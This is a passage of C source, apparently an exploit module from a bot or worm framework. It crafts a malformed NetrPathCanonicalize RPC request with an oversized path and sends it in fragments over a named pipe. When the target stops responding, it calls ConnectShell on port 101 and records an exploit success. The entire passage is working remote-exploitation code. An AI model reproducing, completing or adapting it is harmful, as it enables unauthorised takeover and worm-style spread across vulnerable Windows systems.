+= 32; nBufferPos += sizeof( wchar_t ); } else { for( size_t n = 0; n < 16; n++ ) memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) ); } nPacketSize = sizeof( PStart ) + sizeof( UNISTR2 ) + nPathLen + sizeof( wchar_t ) + 4 + sizeof( NetrPathCanonicalize_End ); pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { CloseHandle( hPipe ); free( pPath ); return false; } memset( pPacket, 0, nPacketSize ); nBufferPos = 0; memcpy( pPacket, &PStart, sizeof( PStart ) ); nBufferPos += sizeof( NetrPathCanonicalize_Start ); ( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) ); ( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0; ( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length; nBufferPos += sizeof( UNISTR2 ); memcpy( pPacket + nBufferPos, pPath, nPathLen ); nBufferPos += nPathLen; while( nBufferPos % 4 ) nBufferPos++; memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) ); nBufferPos += sizeof( PEnd ); free( pPath ); memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) ); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; ReqNormalHeader.NormalHeader.flags = 3; ReqNormalHeader.NormalHeader.representation = 0x00000010; ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 0; ReqNormalHeader.prescontext = 0; ReqNormalHeader.opnum = 0x1f; memset( &ov, 0, sizeof( ov ) ); ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL ); bExit = false; nCount = 0; while( !bExit && nCount < MAX_TRIES ) { nCount++; if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) ) break; if( ov.hEvent ) { if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING ) return false; else { if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT ) { bExit = true; ConnectShell (exinfo, 101); exploit[exinfo.exploit].stats++; } } } } CloseHandle( hPipe ); free( pPacket ); if( ov.hEvent ) CloseHandle( ov.hEvent ); if (bExit) return true; return false; }